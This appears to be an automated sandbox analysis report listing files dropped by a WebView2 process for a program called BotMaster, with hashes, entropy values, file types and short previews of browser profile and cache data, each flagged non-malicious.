                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\8410c0f4-7469-457a-992c-bb4da2c2e9a3.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):18004
                                                                                                                                                                                                                Entropy (8bit):6.069218349878853
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:n8PofZScWax9YzUbCIhmbI34qS3sidnNBSXr3j3GKWPESEryJ:erfax9YzUOIYbIofsidI3jGKfZY
                                                                                                                                                                                                                MD5:730E3136884FDAC23492290CEAFCFC92
                                                                                                                                                                                                                SHA1:D02DD35818CBCE935AAB0B1B7BE14F1755D1C034
                                                                                                                                                                                                                SHA-256:B935AB38B5BE671F4B2555EF3119311B02DE9BE5A1D6F25EBCFC9178701701F1
                                                                                                                                                                                                                SHA-512:BBFCB4ECFE21A72988A551E6E48DA8227F8CEC4E7C6DC98C4D8B6766924F02EDF9DD24F630C064ECE4225D4D10FC8A6E644E9D4FE20B9962276E1D8D08525A38
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"domain_actions_config":"H4sIAAAAAAAAAL19a3PktrH2X1HpU5LyQNLe5M355HeziV3Jxi5nU656T6VUIIghIYIAF5eZ4bj83083ONJKOwRmmutzPngtUWzc2Oh+utHd+PXyO1Nb5/i/v/txI51Ttbz886+XfBi0Ejwoa/zln//7P99cDhYeKIm//XppeA+vXb6vG/nv7y6/uQzjgL8P3AXF9c9y0FzIXpoAf9twHfGP30GT8hdZ/V2Fq9cvb9nLNxd/+Pv3Hz/845sLrTp58TcpOvvHi3ets728ur1m1+zl65ffspvrFxf/4mvu1AMZdnt1A3+5vX3z8vK3bx7HM9E+HZGEVz/aTpr5MT0l/ov9pw2Pa/DYQv3s8ZP3cRRv3/6vTP7tW5j8q29fvWK3r47nPv355ub1NXv9+nj6/+djmvsCwFTvtIL+vlcm+PL3OHr3MMBfL70UK9GuIl/xuk6MVzlu4KfLv1nbaHkY2+VvwJ+f33Wytxug/+/LD0o46+06JJa5hLeil+6ON9DZnX1kd2ADbAF+98Dvl3+++e2bS765uRO2luJuLXmITt6JFtbjCdXRJjk8kPVd2isjNPzjEH6MuOa17bmCpi+NDGutdkzYPq3b+SQ+xFpZP1FmNuQj8WG5v9vcvMNJ/HWawzucwuGdoxmLuqfOzujx/W6wXv6k+fiz5PX4dNxeK9MUJvpI/Qv0uFFGPiUONrKwWULZ8x38LNlhtxKpeSUWD3nDkEIupdf8lqmwhHK3VkaFcWnHWx5EC6MXtsSXxSZUAwOQ0IazDTDV0mYq2Pgiug225Fu+ZYIvaaaVuMU28BcbnDVLRyMczMkB/4uWGyP10nZM4KFFllz6fex2cNKD0PKDjosXd9PuFm6pNuq4tFd4nX2KSnTwUYaljfxF+fY7M25b6WRZAM6KpIM0xEcuPXqisWY7PhA8PjkWlkk10MTl9/Dmh/X3ciOSTKaJjgKxAbUpAcQVF+aY/j

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                MD5:1045BFD216AE1AE480DD0EF626F5FF39
                                                                                                                                                                                                                SHA1:377E869BC123602E9B568816B76BE600ED03DBD0
                                                                                                                                                                                                                SHA-256:439292E489A0A35E4A3A0FE304EA1A680337243FA53B135AA9310881E1D7E078
                                                                                                                                                                                                                SHA-512:F9F8FCC23FC084AF69D7C9ABB0EF72C4684AC8DDF7FA6B2028E2F19FD67435F28534C0CF5B17453DFE352437C777D6F71CFE1D6AD3542AD9D636263400908FD2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                MD5:1045BFD216AE1AE480DD0EF626F5FF39
                                                                                                                                                                                                                SHA1:377E869BC123602E9B568816B76BE600ED03DBD0
                                                                                                                                                                                                                SHA-256:439292E489A0A35E4A3A0FE304EA1A680337243FA53B135AA9310881E1D7E078
                                                                                                                                                                                                                SHA-512:F9F8FCC23FC084AF69D7C9ABB0EF72C4684AC8DDF7FA6B2028E2F19FD67435F28534C0CF5B17453DFE352437C777D6F71CFE1D6AD3542AD9D636263400908FD2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\BrowserMetrics\BrowserMetrics-65EDE3C8-17B8.pma

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                Entropy (8bit):0.6953748977568354
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:8HfPJ+uwKF18zh/0mgcRGg1DRFFCRGOa+zscPRGkMqBbhkOc:ah+Tw8zh/0mgpg1HFrb3Dq0z
                                                                                                                                                                                                                MD5:E5E7022C2C5A02E6FF85C6D8F650073A
                                                                                                                                                                                                                SHA1:11BBDC164E16053387E46E7A5A5F9FFEC91E6C30
                                                                                                                                                                                                                SHA-256:FE9B2A2B12686B91EFAD6EE03696B1523F15379B8D8A4B0EFECBECE744A3A27F
                                                                                                                                                                                                                SHA-512:259B86C0008E9FD259BC296FE96A0AE3F811BFFD83319C72206CFBDF9538A495C07F69BEAD49A74BB8284AD905EEFD4F44D534001427DB23C7A61D2EE160D4FF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...@............C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....;.........117.0.2045.47-64".en-GB*...Windows NT..10.0.190452(..x86_64..?........".cyyjcj20,1...x86_64J....?.^o..P......................>..*......iW:00000000000000000000000000000000000000000000!00000000000000000000000000000000000000000000!BotMaster.exe.!1900/01/01:00:00:00!BotMaster.exe".5.8.0.12...".*.:..............,..(.......EarlyProcessSingleton.......Default3.(..$.......msEdgeEDropUI.......triggered....8..4... ...msDelayLoadAuthenticationManager....triggered....<..8...#...msSleepingTabsShorterTimeoutDefault.....triggered....8..4... ...msEdgeMouseGestureDefaultEnabled....triggered....8..4.......msEdgeShowHomeButtonByDefault.......triggered....<..8...$...msConsumerIEModeToolbarButto

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Crashpad\settings.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                Entropy (8bit):1.9016799979883232
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:FiWWltlkwK1BAdNEjYb1gmlx/ll:o1IBWfCmlZl
                                                                                                                                                                                                                MD5:2DADA2988B066691AE02C51D0F46B739
                                                                                                                                                                                                                SHA1:3AF2751D0B33D0BBFC7872686562F7F4BC658F84
                                                                                                                                                                                                                SHA-256:6AFEFDA91934FE35F717E0D0108507FCE426D3AF6D209EF73BA6B834E2704593
                                                                                                                                                                                                                SHA-512:E1ECCDD6C31EDABA1582E85728B1D15680EB724FC970DEA5AB89C194B6C581509390739CB96787CA522D9E7302D0E9C48B7A11D0A018BBD46FA62DAD123FE536
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:sdPC.....................k$../.O.r..~...................................................................................................................................................................................................{F3017226-FE2A-4295-8BDF-00C3A9A7E4C.}C:........

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Crashpad\throttle_store.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20
                                                                                                                                                                                                                Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:level=none expiry=0.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\9b42a4a8-7d6f-4559-8851-55d591dde2da.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6051
                                                                                                                                                                                                                Entropy (8bit):4.857157401905481
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:st3/BQs13bb9JtG8zFd81h6Cb7/x+6MhmuecAJ1wa1eAeex32MR7K:stPOsVtGk/8vbV+FcJmaQAj3PhK
                                                                                                                                                                                                                MD5:A7345907F587845D58A6AC73B465CA90
                                                                                                                                                                                                                SHA1:85975B72AEAF6E9503A78337FDD35D5C5DA77084
                                                                                                                                                                                                                SHA-256:54483F38F8C45F869C021871BCBB89FD1499AE1A56A131EFE3F28877C68CEAD8
                                                                                                                                                                                                                SHA-512:21E86A455AD16E6DF8B12B704AC7FFA14914C0592541D23ED76553B48FB857550236FC99654A126F05B103BA6AC9AAA6BAA42B368CCE6A25B96EF2FF56D583B8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13354562762322933","alternate_error_pages":{"backup":true,"enabled":false},"autocomplete":{"retention_policy_last_version":117},"autofill":{"autostuff_enabled":false,"credit_card_enabled":false,"custom_data_enabled":false,"custom_data_fill_enabled":false,"custom_data_identify_info_from_form_enabled":false,"custom_data_save_enabled":false},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"browser_content_container_height":576,"browser_content_container_width":1049,"browser_content_container_x":0,"browser_content_container_y":0,"countryid_at_install":17224,"credentials_enable_service":false,"dips_timer_last_update":"13354562762154074","domain_diversity":{"last_reporting_timestamp":"13354562762321885"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data"

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\AssistanceHome\AssistanceHomeSQLite

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                Entropy (8bit):0.3202460253800455
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                                                                MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                                                                SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                                                                SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                                                                SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\data_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                Entropy (8bit):0.3715048481630731
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:yKFquosCIgLyLM4xZrxTWQnJsGQeUEsTwuirG4gNJK3:yK+tLyLPaeUvTwuirG4gX
                                                                                                                                                                                                                MD5:E3A6845CAB1F2419EF3736FEE7E0B7FF
                                                                                                                                                                                                                SHA1:F70967C5AD2F2B004FF46A587BA8D24395DF790B
                                                                                                                                                                                                                SHA-256:7A9A99ED3F1468B11CE0398C2E690972F92967CC6ED822973082C4BFD1C8BE5E
                                                                                                                                                                                                                SHA-512:077DD315CCF98FCB270A6BDC988328E8333AB7D4D7533223907B33B232462EB4461BFD0B465113779969C698CBD904BA6245B55F01BA83D89BA9385ACA20B26D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:............$...4.....................................................................?.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\data_1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                Entropy (8bit):0.6602194561275583
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:XIqIH/wQrTTHPmoD30xA6V5Q4lc24l1B+9suUC36Ka7SUId1:XrIH/brTTcl44lZ4lzYnUC36p7S1d1
                                                                                                                                                                                                                MD5:34360AF2FEDBD6362655FB717E29D331
                                                                                                                                                                                                                SHA1:41C885A1D918BDFD0BB9F112BC78A555FD9F84CF
                                                                                                                                                                                                                SHA-256:969884912C3195ACBB3648A501A41D8DEECACDDD7C677F1178CF3EE0B0A91F4A
                                                                                                                                                                                                                SHA-512:91EA225B6153EE6A4A6A6C985D8AA6BA83CF0356BC65D3E28CB492A797496A50EA34DAABB087A6CBDC64CF8321C1B0251AFCCE600E9BBC366F34F1A9833D7D13
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:................:.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\data_2

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:dBase III DBT, next free block index 3238316739, block length 1024
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1056768
                                                                                                                                                                                                                Entropy (8bit):0.11363135937592654
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:RV+zaJD+YIm1TSdJbT1jkwbtQXlIxNuSKJ0lU+X7FzOBAmBbV5OygMYMkr:6aJD+PmYJZbtM+xNRKO2+XBz5LdSk
                                                                                                                                                                                                                MD5:8E9669F3CFBE7A4C365B3C840A6C0232
                                                                                                                                                                                                                SHA1:B674910E758A1681FF50A6A748CFE3DDEEFFCA67
                                                                                                                                                                                                                SHA-256:6993387AE147150D85647F3AD020DDBB5DC02500A0F0AB0A8011590BAC01DB16
                                                                                                                                                                                                                SHA-512:88C83FE92C8970C91495160435D6EB49028366C7E76B75DAFAC812BFC5B1FAAE96B861505B02E2B90152A69C21B5CEB208399626A657579FEEF8B6784DB09FF5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\data_3

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4202496
                                                                                                                                                                                                                Entropy (8bit):1.2355861762215254
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:JNYIxZvRP6o+RFGTPW69p5TrTTP++JBuQc1jOXM4Ad4p/1byADZ64ZW81Nq/8b/j:oIxZ15/HBJQQagZXa
                                                                                                                                                                                                                MD5:1625BD5323DFD9D2CE60CEBFDDAB1A74
                                                                                                                                                                                                                SHA1:0C7BBDB0DBCCEB231DE744CBAE2EAE520CEAA61A
                                                                                                                                                                                                                SHA-256:0EE146D46A62D38F8BF0DB210ACC9DD9ECEF6D6B0AB42744F7760C3D283E2317
                                                                                                                                                                                                                SHA-512:45840428AC8285D98BC8333CAB166F40D26AAD8EFC397A1632D758661F1361C62E696F1F1C3C870C2006546B4436D3D62CD5ADEE5FB1FB6E399CF1FC2908D979
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:................A.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):54344
                                                                                                                                                                                                                Entropy (8bit):7.994826034490452
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:sKqN8mcBHxC1yAvZhxUGihSH8+wnKpM5hf/UQjt5HNVdzAvtgnd0WvSfoWNBCPaz:sKycx61iUcnL5/Uy9sqnd0Wvla/ZZ
                                                                                                                                                                                                                MD5:E52CEA4859139394226CE3C3464FDD2D
                                                                                                                                                                                                                SHA1:36C75FBADC6E33200DD60FB7C332747CC3B4444B
                                                                                                                                                                                                                SHA-256:D4F977A9FCF09116B3A4C307B7A024C4938D4A325F478FAB656104EE4F4FF95E
                                                                                                                                                                                                                SHA-512:A67296C44452FD1D57A06A72EFE4700CFC2867E981E0B3466B9BF5408FF7C6D3096A5CF4BF38CECFA58841689B663F2D34958AE901CFBE3BB58245F565EDF969
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...!..^.."Y....*0v7.:..{*.z.{_N%.'8.....0...}.J.H...8....Y...*...#.G....zk.......Q]...U......0..4..|...^....N...._....WY=.YY..j....z..T......f.s...?3-.5.../?.RG..."E.l....fz..n.pe.... .Lw@`...op.(@+..9..`....S.n4...0X..+.V........w.^.....D.gg....M{.................v.`c..B....0......+E.u....:..7m........1..=.DD.,G...8.syV.e..~....\......V.....9......D...j.....z....R.......U+...m.{.s../.,y....E.I...T5y.:..'.Ti[.x........E.(q.......7"?.Q...).......j..Nd...?..[...`..NXOS.>.8....|Qz.l1.R.%~.L.(]..../.!..5.c.,........n.8E.O..........~.O........R"...).wY..0..:x..~...M..$M..?..A....!..>..^.E.... .......O..+..yX........}.iJ.Z}q|._~.o+...?...^!m/.~......Z..z..?.V.".@3.}......S.e?..f...K#..c.m........).V+.O]....]=..._....._.............w.....p..1h..=..R..Y'8.=.u}..I...1..M.......%.....O..4....MZ.......^..~..|W.t%>.*.^...o.M7....?.XN....]...a.}Q..'..>.4..+...X..7..=.e!.#8.V?....o.[..]8...q.....9L..0.OWX..s...N...b.!........#y..Q.,..I?.;.Q......cX...xEZ

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000002

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (59028)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):219195
                                                                                                                                                                                                                Entropy (8bit):5.638201345272312
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:Usnu5vguRlMiK3Dr/dvy9p8EkLu4L4myhJyWCxqaN9oOU3YLkXu7eBfwoVuLFhHu:zu5vguf+XaRkB9oO0Xn2dj3t+fuF+0u
                                                                                                                                                                                                                MD5:3B0F5CFB734A4D11E8BA8F6CF4448955
                                                                                                                                                                                                                SHA1:F8B272F0C832029EF82E3FDBF6900AA0E5D7902B
                                                                                                                                                                                                                SHA-256:467E18640E5B88FA14D7AB794459ACD797C38E76B5CEA1378F2294526CA6D423
                                                                                                                                                                                                                SHA-512:15CDE3BD3F42E0B87170BB222296C3DB8A00C0C12EA3CD0F37F2A82FBA44B14EF8FCC56AEFC3E9B020802D779EDDDEE9022C1F53411449E3D3EEC8AA396366B8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:/*! Copyright (c) 2024 WhatsApp Inc. All Rights Reserved. */..selectable-text{-webkit-user-select:text;-moz-user-select:text;user-select:text}.select-all{-webkit-user-select:all;-moz-user-select:all;user-select:all}html[dir] :not(.selectable-text)>:not>:not::-moz-selection{background-color:initial}html[dir] :not(.selectable-text)>:not>:not::selection{background-color:initial}._11JPr{visibility:visible}.._3cjY2{visibility:visible}..URwQL,.emoji.URwQL{display:block;pointer-events:none}html[dir] .URwQL,html[dir] .emoji.URwQL{cursor:text}html[dir] .emoji.URwQL{background-image:none}html[dir=ltr] .Ov-s3+.Ov-s3{margin-left:2px}html[dir=rtl] .Ov-s3+.Ov-s3{margin-right:2px}._2KRZE._2YS1h,._2jWID._2YS1h,.YGPO2._2YS1h{width:var(--emoji-width);height:var(--emoji-height)}html[dir] ._2jWID._2YS1h.emoji{margin:2px;transform:scale(1.2)}._2jWID.oc2ST,._2jWID.URwQL{width:var(--emoji-size-medium);height:var(--emoji-size-medium)}html[dir] ._2KRZE._2YS1h.emoji{margin:8px;transform:scale(1.8)}._2KRZE.oc2ST

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000003

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):89210
                                                                                                                                                                                                                Entropy (8bit):7.994540197500218
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1536:wSS6O4O20i8So+VO/JZARplDqBkTindDacGl5LV+TT/4xOLTQsQcmpYb:wGL103GI/3he+dDaPz8TYOLTQsQcm2b
                                                                                                                                                                                                                MD5:2CB586BDDEB49540EB56C0F7AF4725DC
                                                                                                                                                                                                                SHA1:622D5D204E4BD8F68FA60E6AF2E558C416761304
                                                                                                                                                                                                                SHA-256:05991008258FECDA54EF330866E2765D5A56F6D8460F7A3E84D25C4AC2A261D7
                                                                                                                                                                                                                SHA-512:95ACDD08EF6A6113EE2C0A0CDBF5A66B478592404A997376F5908227D7C379C2EDE9B8CE2B4364BFFBD1865024748AD8D15C7C26F22DF69232E9C17CAEAEE870
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:'8.QE`...@.<.Q].aN.p9i...j..w..*~...?....`...aZ..r{.>..}[.......o....y....70.(......6.......C...........*..s.Q.k.H?.q..........(B!.......??_.k&........=.D.'....=Y..."(..&^..V...%.nXh....E.$.*.qnT...}y=S..R....l...u......f.bnu.%.h*1...4n.R m.....Z.b.xG.....{3-.iWE.......s...!O.x:o.\.{.w.....g&.=@..2...t.....rw{......2 .p..=......U...g}..8.^)..EW..PI. ..D........|.....g...cn.L..A.......j.......n....u7 m.H..8.AP3E..Yj.."..Fk(...n......].&J j.......o..0...i..p.C..(".;v6.....RD@.Q......* ..9.e:..oGJ(......HU;.6.W.I...1....}k.........M..W.......P3..6...B....1,m../g..Q..tY...t....l!41i.C.._...k.c,...(7..7..r.\..'Z.\S%.H..O.g...6Eh6...O..'.=..p......U.~R;/b....[.>..g....YD.\.U\+..k .I......8S.....X.A:q......)..{ru....).w..........G.@.>4.....1p.B.. .BZW..j.8.....y......%..L.I:.5...x..D.oZ..\]h.!...S.....4>...&n.....H.0d#...]x.!.14..E.It.D...y\..4fQ..e.d..z.w...:0.|y.....e.Z....}.7...w....g[..4.].f.......3.;.......i YtuM.z..,.......{s........z.......:.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000004

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 385593
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):110170
                                                                                                                                                                                                                Entropy (8bit):7.9963352424087315
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:3072:vR6RKrhSbEs7wicE3Ip6gZjcPWFtSnavaX/KNFnn3Q:4KrYbEsUicE83nfSVSNFng
                                                                                                                                                                                                                MD5:69F8FF0F8774AF735D4CBAA8531AE2A1
                                                                                                                                                                                                                SHA1:BC0E9FA4A45A2BA06A24A3E126FBDEF55E48C39B
                                                                                                                                                                                                                SHA-256:65C49B85BBB1C71124858DB1DEFB83F80C8BBB369C42A56F95839559B4EEA897
                                                                                                                                                                                                                SHA-512:8D69C04B1D67A2D141EAEE7C895AB628AB9BF4DA82EC23CF5EE14890A34D9FE32BAFD1C2515A7CE296D734CF2833C524AE8AAC78BABC3C68B4D7DDC3BC23F9CC
                                                                                                                                                                                                                Malicious:false
